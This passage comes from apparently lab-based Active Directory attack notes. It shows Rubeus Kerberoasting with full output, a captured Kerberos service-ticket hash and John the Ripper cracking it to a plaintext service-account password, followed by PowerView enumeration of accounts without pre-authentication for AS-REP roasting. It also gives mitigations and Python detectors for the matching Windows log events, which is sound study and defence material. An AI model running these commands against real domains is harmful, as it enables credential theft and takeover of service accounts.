9D776C20F7F8BBF8A1A59FABDC924627570B1076000309CA1F6A193D0EC52E5B6D9376D972C8E0CE791315DF4A527DC18
97420B3630AF5F2C27BA0FAE8EB066BA174212DF1DC2C5C8CE4DBAB15E0C1F3614A1D0D3D0583CB928875C009B26B159F
A70ED556D8340AD4F8691A79B24DED77AA7EA957527F49D10894F0036297AA1B01913C199FBF17AE41278DB505FAFE216
31BFE9AF4B94FBF5C9BE215DBE7B5BEA764BD5485325C904D516E811D181C7840C2890135A21BAA80AB8E8EF144874084
7B2133D2E6A69548B610BCD6952779F8D6E4A259502D13A256CEE0488C05FBAD56A6530776955550B739CB27FB1155C69
ECC626152FE19C75E1E3AC6BDBF820E21065DD4C811DC8BAABDA94C2CB2E5A42C34AFD2BEEA4B64D13A8A6BB53B34AA5F
482EED62F32D6CEDAE535ACB78C6D26BD4FA80E82807B8214C09B8BA9EE64F96F278728F4474F170EC359835B4E45A0BD
82854B73FEF4EA1F906A44CADF8D9008C06EAE90BECA2BD7CF8EF4C0B0797C0A4FD6ECB3B56A77DCD64F654CA15011D1D
BFBC11CD22BBB5EA9155F2BCA696FC9F8C0BA684B05A1FD890503FE88ECD74B2CA24D77DA28DB1FA988DBFADEAC4EC71D
3DF7850005BFBF8A5AA4FBD43F9471FCEFA943092F952E04C9C0B5E821BA64C617FE63B3EA3FC068AA11112760A0CCF60
011CB088BED7644E9DE257748C6857418C4A758E68A0413465FAD7A39E74EDD72788D35A2576CEC29CC43DD63D2BA6792
1F0CBEC40FCAC4891EF65DA90697840F22588F52B24EA30BADA604882493907CA05A4168BFB3202BA551177308FFDC7F6
92A2847011339266EF8E4424F5F13AF00DF1DFC4D62C8848122D3FE4294FBFCFBA3017D683DEE42948AF7D49A2F4FEE89
D28CA217A64D70351AC9F9BFE8F7B943ECA284339CE9978F1703270DDD61ABC1294D5FDD0DD205C0FBDF27F1299295173
FC16D299CA3242D001801F34273CF676BE1D5BAB6E585814286C0306F2033316352B8471DF03D8132062E040990A2E9FA
9A5A24F550BE1FF8419D790E847F20111F047106E7EE23D8F8F5158352ED61E955094812D1F2BF828F492239AB061095D
87810161

Kerberoast all possible accounts

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast /rc4opsec /outfile:C:\Users\student163\Desktop\shared\hashes.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user


[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for
everything else
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 2

[*] SamAccountName : websvc


[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\student163\Desktop\shared\hashes.txt

[*] SamAccountName : svcadmin


[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\student163\Desktop\shared\hashes.txt

[*] Roasted hashes written to : C:\Users\student163\Desktop\shared\hashes.txt


It is advisable not to kerberoast all possible accounts: it is very noisy, and MDI can easily detect it,
since we are requesting TGSs continuously.

The better approach is to kerberoast individual users.

Once we have the TGS, we can crack the hash offline to recover the password. For this we will use John
the Ripper in our lab.

We first copy the hash we generated to a text file. While copying it, delete the port information, if any:
John will not be able to crack the hash when the port information is present. For example, in the TGS we
generated, the hash looks like this.
$krb5tgs$23$*svcadmin$DOLLARCORP.MONEYCORP.LOCAL$MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local:1433*$3C2E3BD874DA5BED14ABF5F25E8875BB$BD4B4B4A576518D0F5C7E1303E
C69FCCDA3DA61E4DDA54C96A49F6488F9888C5129A1512EF9E2681081D70A3D8F4595B454BDBC40E0EDBF7888B00472E7
98D7AAFA25E1F27C13641C423412375773CCC2B4FF32D2AE0BC994447EFD9B1EE7DA3A431F083832A31718706B69D28BF
B9D5F2810D4B5E446CE8386E0FD48F66065314C7F654B12E0272DBCC034A29A5A681A13F908E136D9B2177245BFF4C0AD
05620C0C3D6CC7C5B4AA9E173096A97562894242DC329EE7C9171FD2C3CEBD3D8D9266E9B5592AF75C33DCBB074CD5506
FCBF32A1726FCBF32E12390F0BB8F49B1C8486C7C0631B3D344037D8BA3ED86D199311E5C9AAFEEE09783337C59C214BC
9B2686F6FAFB582EBD80B641BFB3F97B9338FD9835A858A8813F111ADBD96A3E2BD1D64753EF4FA87531097449324944A
22E7D1208460C80E4B4CB0478A10EEBEB7D9553D958B0DBF6D100E62D6885A96F9FBB4A9BE5BE786F10E29867CC9A0CE0
0477868B239C03C512D13AFDA5110A99D2ED88710A507DCDE6AC88188ADDB5C462242C1E548AC83E876108EAFB12074E5
9D776C20F7F8BBF8A1A59FABDC924627570B1076000309CA1F6A193D0EC52E5B6D9376D972C8E0CE791315DF4A527DC18
97420B3630AF5F2C27BA0FAE8EB066BA174212DF1DC2C5C8CE4DBAB15E0C1F3614A1D0D3D0583CB928875C009B26B159F
A70ED556D8340AD4F8691A79B24DED77AA7EA957527F49D10894F0036297AA1B01913C199FBF17AE41278DB505FAFE216
31BFE9AF4B94FBF5C9BE215DBE7B5BEA764BD5485325C904D516E811D181C7840C2890135A21BAA80AB8E8EF144874084
7B2133D2E6A69548B610BCD6952779F8D6E4A259502D13A256CEE0488C05FBAD56A6530776955550B739CB27FB1155C69
ECC626152FE19C75E1E3AC6BDBF820E21065DD4C811DC8BAABDA94C2CB2E5A42C34AFD2BEEA4B64D13A8A6BB53B34AA5F
482EED62F32D6CEDAE535ACB78C6D26BD4FA80E82807B8214C09B8BA9EE64F96F278728F4474F170EC359835B4E45A0BD
82854B73FEF4EA1F906A44CADF8D9008C06EAE90BECA2BD7CF8EF4C0B0797C0A4FD6ECB3B56A77DCD64F654CA15011D1D
BFBC11CD22BBB5EA9155F2BCA696FC9F8C0BA684B05A1FD890503FE88ECD74B2CA24D77DA28DB1FA988DBFADEAC4EC71D
3DF7850005BFBF8A5AA4FBD43F9471FCEFA943092F952E04C9C0B5E821BA64C617FE63B3EA3FC068AA11112760A0CCF60
011CB088BED7644E9DE257748C6857418C4A758E68A0413465FAD7A39E74EDD72788D35A2576CEC29CC43DD63D2BA6792
1F0CBEC40FCAC4891EF65DA90697840F22588F52B24EA30BADA604882493907CA05A4168BFB3202BA551177308FFDC7F6
92A2847011339266EF8E4424F5F13AF00DF1DFC4D62C8848122D3FE4294FBFCFBA3017D683DEE42948AF7D49A2F4FEE89
D28CA217A64D70351AC9F9BFE8F7B943ECA284339CE9978F1703270DDD61ABC1294D5FDD0DD205C0FBDF27F1299295173
FC16D299CA3242D001801F34273CF676BE1D5BAB6E585814286C0306F2033316352B8471DF03D8132062E040990A2E9FA
9A5A24F550BE1FF8419D790E847F20111F047106E7EE23D8F8F5158352ED61E955094812D1F2BF828F492239AB061095D
87810161

We need to remove the :1433 from the hash so that John can crack it. We copy the hash to a file called
hashes.txt and run John against it.
C:\Windows\system32>C:\Ad\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist="C:\AD\Tools\kerberoast\10k-worst-pass.txt" "C:\Users\student163\Desktop\shared\hashes.txt"
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*ThisisBlasphemyThisisMadness!! (?)
1g 0:00:00:00 DONE (2024-07-03 03:19) 41.66g/s 85333p/s 85333c/s 85333C/s energy..mollie
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Mitigation
• Use long and complex passwords for service accounts to make brute-force attacks impractical.
• Regularly monitor service accounts and their usage. Look for abnormal ticket requests and
authentication attempts.
• Use Managed Service Accounts (MSAs) or Group Managed Service Accounts (gMSAs) which
automatically manage passwords and reduce the risk of weak passwords.
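The second mitigation bullet, "look for abnormal ticket requests", is what the earlier note about MDI and etype 0x17 describes from the attacker's side. The following added Python example (not from the lab notes or any product) applies the two signals a detection would key on to constructed Windows Security event 4769 data: an RC4 (0x17) service ticket issued for a user service account, and one principal collecting tickets for several service accounts within a short window, which is what the "kerberoast all possible accounts" run above looks like in the log. The field names are those of event 4769; the flat key=value line layout, the service-account inventory, the timestamps and the 192.0.2.0/24 addresses are this example's own.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 data.

Added example, not from the lab notes or any product: constructed 4769
records are scanned for RC4 service tickets and for bursts of requests
against many service accounts by one requester.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = 0x17        # TicketEncryptionType that downgrade detections key on
STATUS_SUCCESS = 0x0

# Constructed inventory of user accounts carrying SPNs (the kerberoastable set).
SERVICE_ACCOUNTS = {"websvc", "svcadmin"}

# Constructed 4769 records. Line 1 is a routine AES ticket for a computer
# account; lines 2-3 are RC4 tickets for both service accounts within two
# seconds; line 4 is a krbtgt ticket; line 5 is a later, unrelated AES request.
SAMPLE_4769 = """\
2024-07-03T03:10:01 TargetUserName=student163@DOLLARCORP.MONEYCORP.LOCAL ServiceName=DCORP-DC$ TicketEncryptionType=0x12 IpAddress=::ffff:192.0.2.163 Status=0x0
2024-07-03T03:12:14 TargetUserName=student163@DOLLARCORP.MONEYCORP.LOCAL ServiceName=websvc TicketEncryptionType=0x17 IpAddress=::ffff:192.0.2.163 Status=0x0
2024-07-03T03:12:15 TargetUserName=student163@DOLLARCORP.MONEYCORP.LOCAL ServiceName=svcadmin TicketEncryptionType=0x17 IpAddress=::ffff:192.0.2.163 Status=0x0
2024-07-03T03:12:16 TargetUserName=student163@DOLLARCORP.MONEYCORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:192.0.2.163 Status=0x0
2024-07-03T03:40:00 TargetUserName=websvc@DOLLARCORP.MONEYCORP.LOCAL ServiceName=DCORP-DC$ TicketEncryptionType=0x12 IpAddress=::ffff:192.0.2.10 Status=0x0
"""


def parse_4769(text: str) -> List[Dict]:
    """Turn the key=value lines into dicts with typed fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, *pairs = line.split()
        fields = dict(p.split("=", 1) for p in pairs)
        events.append({
            "time": datetime.fromisoformat(stamp),
            "user": fields["TargetUserName"].split("@")[0].lower(),
            "service": fields["ServiceName"].split("@")[0].lower(),
            "etype": int(fields["TicketEncryptionType"], 16),
            "ip": fields["IpAddress"],
            "status": int(fields["Status"], 16),
        })
    return events


def rc4_service_tickets(events: List[Dict]) -> List[Dict]:
    """Signal 1: successful RC4 tickets for an account in the SPN inventory.
    Computer accounts and krbtgt are not in that inventory, so their RC4
    tickets are ignored here; tune the set to your own environment."""
    return [e for e in events
            if e["etype"] == RC4_HMAC
            and e["status"] == STATUS_SUCCESS
            and e["service"] in SERVICE_ACCOUNTS]


def mass_roast_candidates(events: List[Dict], window: timedelta = timedelta(minutes=5),
                          threshold: int = 2) -> Dict[str, List[str]]:
    """Signal 2: one requester collecting RC4 tickets for >= threshold distinct
    service accounts inside a sliding window. Returns requester -> services."""
    by_user: Dict[str, List[Dict]] = defaultdict(list)
    for e in rc4_service_tickets(events):
        by_user[e["user"]].append(e)
    flagged: Dict[str, List[str]] = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            services = {e["service"] for e in evs[start:end + 1]}
            if len(services) >= threshold:
                flagged[user] = sorted(services)
    return flagged


if __name__ == "__main__":
    evs = parse_4769(SAMPLE_4769)
    for e in rc4_service_tickets(evs):
        print(f"RC4 service ticket: {e['user']} -> {e['service']} from {e['ip']} at {e['time']}")
    for user, services in mass_roast_candidates(evs).items():
        print(f"Possible mass Kerberoast by {user}: {', '.join(services)}")
```

Signal 1 on its own is what an encryption-downgrade rule fires on, and it catches a single targeted request as well; signal 2 is the noisier pattern the notes warn about. Both depend on keeping the SPN inventory current, which is one more reason to track service accounts as the mitigation list suggests.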

Targeted Kerberoasting (AS-REP Roasting)


AS-REP Roasting is an attack technique that targets user accounts in Active Directory that do not require
pre-authentication. This attack allows an adversary to obtain the encrypted part of the Authentication
Service (AS) response, which can then be brute-forced offline to reveal the user’s password.

How AS-REP Roasting Works


Enumerate User Accounts Without Pre-Authentication:

Attackers first identify user accounts that have the setting "Do not require Kerberos preauthentication"
enabled. This can be done using tools like GetUserSPNs.py from the Impacket suite, PowerView, or
Rubeus.

Request AS-REP:

The attacker requests an AS-REP (Authentication Service Response) for these user accounts from the Key
Distribution Center (KDC). Since pre-authentication is not required, the KDC directly returns the AS-REP,
which contains data encrypted with the user's password hash.

Extract Encrypted Data:

The attacker extracts the encrypted part of the AS-REP. This encrypted data can be saved and used for
offline brute-force attacks to recover the user's plaintext password.

Offline Brute-Force Attack:

Using tools like Hashcat or John the Ripper, the attacker performs an offline brute-force or dictionary
attack to crack the encrypted AS-REP data, revealing the user’s password.

With sufficient rights (GenericWrite or GenericAll) on a user object, Kerberos pre-authentication can also be
forcibly disabled for that user.
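As a defender-side complement to the steps above (added here, not part of the lab notes), the Python below runs a detection over constructed Security-log records for Event ID 4768 (Kerberos authentication ticket requested). The "Request AS-REP" step leaves a trace the DC logs: a successful AS-REQ with Pre-Authentication Type 0 means the KDC returned an AS-REP without pre-authentication, and a Ticket Encryption Type of 0x17 (RC4) means the encrypted part is the cheap-to-crack variant. The field names match the event's XML payload; the addresses, account names and thresholds are constructed.

```python
from collections import defaultdict

# Constructed Event ID 4768 records with the field names of the event's XML
# payload. Addresses and accounts are made up for the example.
#   PreAuthType: "0" = no pre-authentication, "2" = PA-ENC-TIMESTAMP (normal password logon)
#   TicketEncryptionType: "0x17" = RC4-HMAC, "0x12" = AES256, "0x11" = AES128
#   Status: "0x0" = success (an AS-REP was issued); "0x6" = client principal unknown
SAMPLE_4768 = [
    {"TargetUserName": "VPN161user", "IpAddress": "::ffff:172.16.100.1", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "VPN162user", "IpAddress": "::ffff:172.16.100.1", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "VPN163user", "IpAddress": "::ffff:172.16.100.1", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "student163", "IpAddress": "::ffff:172.16.100.1", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "jdoe", "IpAddress": "::ffff:172.16.50.7", "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "ghost", "IpAddress": "::ffff:172.16.50.7", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x6"},
]

RC4_HMAC = "0x17"


def is_preauthless_asrep(ev):
    """A successful AS-REQ without pre-authentication: crackable AS-REP data left the DC."""
    return ev["PreAuthType"] == "0" and ev["Status"] == "0x0"


def detect_asrep_roasting(events, bulk_threshold=3):
    """Group pre-auth-less AS-REPs by requesting host. Many distinct accounts from one
    source in one batch is the pattern a roasting run produces (compare the Rubeus
    output further down, which walks every matching account); RC4 raises severity
    because the returned blob is the cheap variant to crack offline."""
    by_source = defaultdict(list)
    for ev in events:
        if is_preauthless_asrep(ev):
            by_source[ev["IpAddress"]].append(ev)
    alerts = []
    for ip, evs in sorted(by_source.items()):
        users = sorted({e["TargetUserName"] for e in evs})
        rc4_users = sorted({e["TargetUserName"] for e in evs
                            if e["TicketEncryptionType"] == RC4_HMAC})
        if len(users) >= bulk_threshold:
            severity = "high"      # bulk request pattern from a single host
        elif rc4_users:
            severity = "medium"    # single account, but cheap-to-crack material
        else:
            severity = "low"       # still an exposure: the account lacks pre-auth
        alerts.append({"source": ip, "severity": severity,
                       "accounts": users, "rc4_accounts": rc4_users})
    return alerts


if __name__ == "__main__":
    for alert in detect_asrep_roasting(SAMPLE_4768):
        print(alert["severity"], alert["source"], ",".join(alert["accounts"]))
```

Even a "low" hit is worth a ticket: the durable fix is re-enabling pre-authentication on the account, at which point PreAuthType 0 events for it stop appearing altogether.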

Enumeration
Using PowerView
PS C:\Windows\system32> Get-DomainUser -PreAuthNotRequired -Verbose
VERBOSE: [Get-DomainUser] Searching for user accounts that do not require kerberos
preauthenticate
VERBOSE: [Get-DomainUser] filter string:
(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN161User
lastlogontimestamp : 7/3/2024 3:44:52 AM
userprincipalname : VPN161user
samaccountname : VPN161user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:52 AM
instancetype : 4
usncreated : 201392
objectguid : 1d7faaf7-233f-483d-8e17-bcc34c86d6c6
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:03 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:03 AM, 1/1/1601 12:00:00 AM}
givenname : VPN161
usnchanged : 1481283
lastlogon : 7/3/2024 3:44:52 AM
badpwdcount : 0
cn : VPN161User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13661
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:03 AM
name : VPN161User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN162User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN162user
samaccountname : VPN162user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201399
objectguid : a0229c64-9da4-43d9-88be-eb00bd946fc8
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:03 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:03 AM, 1/1/1601 12:00:00 AM}
givenname : VPN162
usnchanged : 1481284
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN162User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13662
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:03 AM
name : VPN162User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN163User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN163user
samaccountname : VPN163user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201406
objectguid : 236ab7bf-a8bd-4e99-8ffa-12bdf7e2f61b
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:03 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN163
usnchanged : 1481285
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN163User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13663
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN163User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN164User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN164user
samaccountname : VPN164user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201413
objectguid : 11210222-24cf-4b41-837d-25f53751852b
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN164
usnchanged : 1481288
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN164User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13664
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN164User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN165User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN165user
samaccountname : VPN165user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201420
objectguid : 19f3740a-7d2f-45cd-96f1-db8890792d2c
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN165
usnchanged : 1481289
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN165User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13665
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN165User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN166User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN166user
samaccountname : VPN166user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201427
objectguid : 5fc085fc-3daa-496b-aea4-0a922a098090
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN166
usnchanged : 1481290
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN166User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13666
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN166User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN167User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN167user
samaccountname : VPN167user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201434
objectguid : 684ed5a2-237d-40de-a794-028b67a37c00
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN167
usnchanged : 1481291
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN167User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13667
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN167User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN168User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN168user
samaccountname : VPN168user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201441
objectguid : 3fa6a688-e880-4324-b6b6-c6a9bd57b2a0
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN168
usnchanged : 1481294
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN168User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13668
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN168User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN169User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN169user
samaccountname : VPN169user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201448
objectguid : 6ee585d2-017a-4254-a8c8-9480529f4330
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN169
usnchanged : 1481297
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN169User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13669
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN169User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN170User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN170user
samaccountname : VPN170user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201455
objectguid : 0ca9fa48-b3b9-4c83-9ddc-95470629fd25
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN170
usnchanged : 1481300
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN170User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13670
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN170User

